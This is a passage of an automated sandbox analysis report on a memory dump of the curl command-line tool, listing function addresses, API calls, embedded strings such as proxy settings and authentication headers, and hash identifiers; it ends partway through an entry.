Instruction ID: c15d0e7ba08fd9cbda3ee6b0ef6c18531bea351c7b14c650a04d243b1a9f8f9d
Opcode Fuzzy Hash: b49543137be32970d793e18ebee1d1012d02deb88f2d5d3c8d23ded886a85623
Instruction Fuzzy Hash: F6218E32704B8092EA65DB61F4943DB77A4F788B80F840139EA8D47B96EF39CA56C740

Function 000000013F4A5E88 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 49COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4A5F49

Strings

unknown, xrefs: 000000013F4A5EAC
%s%s%s%s%s%s%I64d%s%s, xrefs: 000000013F4A5F38
#HttpOnly_, xrefs: 000000013F4A5F13
TRUE, xrefs: 000000013F4A5EEA
FALSE, xrefs: 000000013F4A5EF6

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
API String ID: 1992661772-3622669638
Opcode ID: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
Instruction ID: f4c7784cfc2e112c7c31139f026846abb85f0272d98cccdd7d2c6f29454340d5
Opcode Fuzzy Hash: fc343e6c086d41137686d84e63e98fad484ebc05623bfdad24137c06067b3214
Instruction Fuzzy Hash: B2211A72A19B8495EF51CF15EA483CA77E0F348B84F98412ADA8C03765DF7DCA9AC740

Function 000000013F4A1CAC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 000000013F4A1CCF
WSACleanup.WS2_32 ref: 000000013F4A1D60

Part of subcall function 000000013F4BC480: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4BC4CF

Part of subcall function 000000013F4A1D84: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1DA8
Part of subcall function 000000013F4A1D84: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1DC4
Part of subcall function 000000013F4A1D84: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F4A1DD7

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4A1D19
QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 000000013F4A1D56

Strings

iphlpapi.dll, xrefs: 000000013F4A1CF7
if_nametoindex, xrefs: 000000013F4A1D0F

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartup_mbspbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 1209992288-3097795196
Opcode ID: 14cd1f6d90930a21dfcc69c42942fed5a483167f9df829ff238c5ce126fe63bb
Instruction ID: 00ae8939b7be86de89f964e3be54664c98b3bd587a752b6040f7025feec4804c
Opcode Fuzzy Hash: 14cd1f6d90930a21dfcc69c42942fed5a483167f9df829ff238c5ce126fe63bb
Instruction Fuzzy Hash: 2311F131E11B4192FF60DB15E8597EB3391BB89754F84053D985D46296EF2CD74BC700

Function 000000013F4A9118 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 83COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4A9153

Strings

http_proxy, xrefs: 000000013F4A919A
_proxy, xrefs: 000000013F4A9167
all_proxy, xrefs: 000000013F4A91F2
ALL_PROXY, xrefs: 000000013F4A9209
Uses proxy env variable %s == '%s', xrefs: 000000013F4A9223

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: tolower
String ID: ALL_PROXY$Uses proxy env variable %s == '%s'$_proxy$all_proxy$http_proxy
API String ID: 3025214199-127164392
Opcode ID: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
Instruction ID: 62fe6250c035d7c70d28d15658ddec80f9f00b35e58d194efe1c9cbc5959051f
Opcode Fuzzy Hash: 0ff445e987f6f2f59b3ac461c031a8cb0d0bb56be4954b269ca301acc5c1ab6b
Instruction Fuzzy Hash: CD314A35A0478485FF21DB11A4547EB77A4AB59B84F88413ADA8C1778AEF2CC70BCB11

Function 000000013F49188C Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F49192D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F49194E

Strings

curl_slist_free_all(slist%d);, xrefs: 000000013F4918F5
struct curl_slist *slist%d;, xrefs: 000000013F4918BB
slist%d = curl_slist_append(slist%d, "%s");, xrefs: 000000013F49196B
slist%d = NULL;, xrefs: 000000013F4918D9, 000000013F491911

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free
String ID: curl_slist_free_all(slist%d);$slist%d = NULL;$slist%d = curl_slist_append(slist%d, "%s");$struct curl_slist *slist%d;
API String ID: 1294909896-250881521
Opcode ID: 83a8e7a11814c19a6075a1129c7a812fda96918e3e70c12dd6aa98a4f9baf691
Instruction ID: fa37fe4ea2d7c912261d03533cf53ef8bc43d5381918953d3b3537b37068cb6e
Opcode Fuzzy Hash: 83a8e7a11814c19a6075a1129c7a812fda96918e3e70c12dd6aa98a4f9baf691
Instruction Fuzzy Hash: 04315A75B10B5292FB11DB16E8503EB37A4E794BD4F408539D95C87AA5EB28C707C700

Function 000000013F4AECD8 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,000000013F4A70B8,?,?,?,000000013F4A7462), ref: 000000013F4AED0F
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000013F4A70B8,?,?,?,000000013F4A7462), ref: 000000013F4AED22
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,000000013F4A70B8,?,?,?,000000013F4A7462), ref: 000000013F4AED2F
WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000013F4A70B8,?,?,?,000000013F4A7462), ref: 000000013F4AED42
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,000000013F4A70B8,?,?,?,000000013F4A7462), ref: 000000013F4AED4B
closesocket.WS2_32 ref: 000000013F4AED7C

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterLeaveObjectSingleWaitclosesocket
String ID:
API String ID: 817826440-0
Opcode ID: 565021a328bc0089918e49ed5a3a620139350b21e882a4a8f3d53f21cbfe40a4
Instruction ID: 31460a75c4ee3426ab99431a14b06d0589a156cbea74ec0622ef432402458dfb
Opcode Fuzzy Hash: 565021a328bc0089918e49ed5a3a620139350b21e882a4a8f3d53f21cbfe40a4
Instruction Fuzzy Hash: 31211836A00B4186FB50DF12E55439A7370F788B90F044529EF6A07BA5CF3DD6AA8740

Function 000000013F483558 Relevance: 9.0, APIs: 6, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 000000013F493968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F49399D
Part of subcall function 000000013F493968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 000000013F4939AD

QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0 ref: 000000013F483582
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000000013F48358D
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 000000013F4835AA
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 000000013F4835CF
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 000000013F4835E9
SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 000000013F48360A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: Console$CtrlHandleHandlerMode$AddressFrequencyModulePerformanceProcQuery
String ID:
API String ID: 3163256418-0
Opcode ID: d238add84db87b7ca8e683a0999c2dbb375ea1daa9bddb8dcb47c48b77225cdc
Instruction ID: d18383b7e00065f1399c433c63c70a76283db920192ebfd1827b5b9971ebe775
Opcode Fuzzy Hash: d238add84db87b7ca8e683a0999c2dbb375ea1daa9bddb8dcb47c48b77225cdc
Instruction Fuzzy Hash: 0E21E735A1470192FB25DB25E8497EB77A1A780B24F44473DD92D826E5EB2D874BC600

Function 000000013F4A3614 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

Failed to connect to %s port %u after %I64d ms: %s, xrefs: 000000013F4A3A8F
Connection timeout after %ld ms, xrefs: 000000013F4A392C
connect to %s port %u failed: %s, xrefs: 000000013F4A384B
After %I64dms connect time, move on!, xrefs: 000000013F4A373C

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID:
String ID: After %I64dms connect time, move on!$Connection timeout after %ld ms$Failed to connect to %s port %u after %I64d ms: %s$connect to %s port %u failed: %s
API String ID: 0-554012191
Opcode ID: 498c42fd69f1ea38a6445b90a59fb3a6e797bbdec9742f269396aa95173662d5
Instruction ID: b74d02397baa6575776cf7353a22975520ca0311a36fbbf292ea109d6d3da4f9
Opcode Fuzzy Hash: 498c42fd69f1ea38a6445b90a59fb3a6e797bbdec9742f269396aa95173662d5
Instruction Fuzzy Hash: FBD1A172A04B8081FF209B2594457FB6760F785BA8F045339EEAA477D6FB79C64AC700

Function 000000013F48EDEC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 000000013F493014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,000000013F4810B6), ref: 000000013F493026

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F57E), ref: 000000013F48EE38

Part of subcall function 000000013F49A914: WSACreateEvent.WS2_32(?,?,?,?,00000000,00000000), ref: 000000013F49AA20

__swprintf_l.LIBCMT ref: 000000013F48EF8F

Strings

Transfer aborted due to critical error in another transfer, xrefs: 000000013F48EF88

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: CounterCreateEventPerformanceQuery__swprintf_l_time64
String ID: Transfer aborted due to critical error in another transfer
API String ID: 471582966-1939301410
Opcode ID: 5b4aff65e33d0b5af15d2ecc1ec42f03042820f4ec29fe80a39ada0b03b81e87
Instruction ID: 191ff9629c149114ce5ed1f8d700489e88fc25129a64be99923fb4a982cc8943
Opcode Fuzzy Hash: 5b4aff65e33d0b5af15d2ecc1ec42f03042820f4ec29fe80a39ada0b03b81e87
Instruction Fuzzy Hash: 82B1CE72B057908AFB54CB6694403EF2FE1B74AB98F08413DDE4A53B99DB7AC646C300

Function 000000013F4CBA58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 177COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4CBC2F

Strings

Curl_output_negotiate, no persistent authentication: cleanup existing context, xrefs: 000000013F4CBB59
%sAuthorization: Negotiate %s, xrefs: 000000013F4CBC28
Negotiate, xrefs: 000000013F4CBA67, 000000013F4CBB85
Proxy-, xrefs: 000000013F4CBC11

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
API String ID: 1992661772-1255959952
Opcode ID: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
Instruction ID: 561a77525423f56e7dd1603849c3388f2c2637be7acff8046718c0fbbb8150b6
Opcode Fuzzy Hash: c7dd1c4233c09f985ab34f5be077910d327cf100838846418c45d0b36795a113
Instruction Fuzzy Hash: 7D61AE36A846C49AFF18CF21D5A53EA67D0E312B88F04263DCA5A47391DB7EC64BC704

Function 000000013F4AA4C8 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138stringCOMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F4AA568
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,000000013F4AAFB6,?,?,?,?,?,?,00000000,?,?,00000000,?,000000013F4AB888), ref: 000000013F4AA5FF

Strings

%s%s%s, xrefs: 000000013F4AA561
Connecting to hostname: %s, xrefs: 000000013F4AA657
Connecting to port: %d, xrefs: 000000013F4AA6AB

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintfstrtol
String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
API String ID: 3295852271-253970900
Opcode ID: 668f76038874af4a03a387691c72402cc44d9f84beb9ac7e2e113d5bfe7bb024
Instruction ID: ec5eb85de18c8b14f7ad6c746da3b1e9694eda6f0b94dc5455e8dd770ff2e4eb
Opcode Fuzzy Hash: 668f76038874af4a03a387691c72402cc44d9f84beb9ac7e2e113d5bfe7bb024
Instruction Fuzzy Hash: 37519A32A04BC486FF618B21E8443DBA7A4B745BD4F44422ADEAE477D5DF38C64ACB00

Function 000000013F492C10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F492CA0
__swprintf_l.LIBCMT ref: 000000013F492D8E
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F492DC1

Strings

internal error: invalid pattern type (%d), xrefs: 000000013F492D48
%0*lu, xrefs: 000000013F492C8B

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l$_strdup
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 3016644273-449433499
Opcode ID: 700e0c9ed3a70d8c7bc352b7ac74fef6bd43bfcd5db43767ff772a170a3355fd
Instruction ID: 917653e3360a2cc0275427b9064f101141aaf996360dd13f43723d059e5e8b97
Opcode Fuzzy Hash: 700e0c9ed3a70d8c7bc352b7ac74fef6bd43bfcd5db43767ff772a170a3355fd
Instruction Fuzzy Hash: 07510632B056848AEB95CF28D1047EF6BA0F354B58F289339CA59077D5CA39CB43C360

Function 000000013F498B60 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F483E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F483E89

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,00000000,?,000000013F4996CD), ref: 000000013F498C51
__swprintf_l.LIBCMT ref: 000000013F498C84

Strings

%*[^]]%c%n, xrefs: 000000013F498BC5
[%*45[0123456789abcdefABCDEF:.]%c%n, xrefs: 000000013F498B8D
%ld, xrefs: 000000013F498C6C

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __stdio_common_vsscanf__swprintf_lstrtol
String ID: %*[^]]%c%n$%ld$[%*45[0123456789abcdefABCDEF:.]%c%n
API String ID: 1923824951-723072255
Opcode ID: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
Instruction ID: e1a32d139429bf60fb35475062d9281de00d9ad65839af9b685f090f5591f829
Opcode Fuzzy Hash: f37293afbeaf3290feb175d0a071532349a716ed9b291873fcbc9302f12e8e8e
Instruction Fuzzy Hash: 5A417B72F05A8099FF618F78D9803EF27A0A755788F98443ADE495779ADA3CC647C301

Function 000000013F49008C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,000000013F486B5C), ref: 000000013F4900B4
strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,000000013F486B5C), ref: 000000013F4900CF
strtok.API-MS-WIN-CRT-STRING-L1-1-0(?,000000013F486B5C), ref: 000000013F4901A2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000000013F486B5C), ref: 000000013F4901B9

Strings

unrecognized protocol '%s', xrefs: 000000013F49018A

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strtok$_strdupfree
String ID: unrecognized protocol '%s'
API String ID: 2873614617-1936080967
Opcode ID: 47f35fb204e21c756b510e253680b0886557f657304aeaaaf921c04c1b8c5e39
Instruction ID: 89f9fd79e895bf88f8b7dbb481875877f99f750dcce9e219352cedd84ea695e1
Opcode Fuzzy Hash: 47f35fb204e21c756b510e253680b0886557f657304aeaaaf921c04c1b8c5e39
Instruction Fuzzy Hash: 49419C31B0475596FB64CF2AA8563EB36E1A715B90F44843DDA09873A5EB3ACB87C300

Function 000000013F48F9B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F48FA89
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48FAAD

Strings

%s/%s, xrefs: 000000013F48FA6E
://, xrefs: 000000013F48F9D0
%s%s, xrefs: 000000013F48FA78

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _scwprintffree
String ID: %s%s$%s/%s$://
API String ID: 4183154275-3147304931
Opcode ID: 5d6d62b624624992e386610f0545070121ca700efaae0c3f0445f1a2afe1afbf
Instruction ID: fbbdca80df7bc2a9ee598728f052b6c81c525ed665539d3f189066a3f1bd094e
Opcode Fuzzy Hash: 5d6d62b624624992e386610f0545070121ca700efaae0c3f0445f1a2afe1afbf
Instruction Fuzzy Hash: 74219131B0578485FE15AB12A9103EBA691AB89BE0F5C543DEE4D0BB96EE3DC6438300

Function 000000013F481ED0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F481F2F
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000000013F481F7D
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 000000013F481F91

Strings

COLUMNS, xrefs: 000000013F481F0D
O, xrefs: 000000013F481FB5

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: BufferConsoleHandleInfoScreenstrtol
String ID: COLUMNS$O
API String ID: 283564500-2358961116
Opcode ID: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
Instruction ID: b8d446d13a8dd4718a3a745876b0fbc04e3e6d550e982f15646d042eee796bc2
Opcode Fuzzy Hash: 1da3228ea2aa50e7219eb3ff8c753aef1ee5678e24aace4e0f4442a4e84c6553
Instruction Fuzzy Hash: 63316372A0474086EB648F25E4443AA77E1F785BA4F14033AEB6D477D5EB3DCA92C780

Function 000000013F490E0C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F490EAA

Strings

%2I64d:%02I64d:%02I64d, xrefs: 000000013F490E99
%3I64dd %02I64dh, xrefs: 000000013F490EE8
%7I64dd, xrefs: 000000013F490F11

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
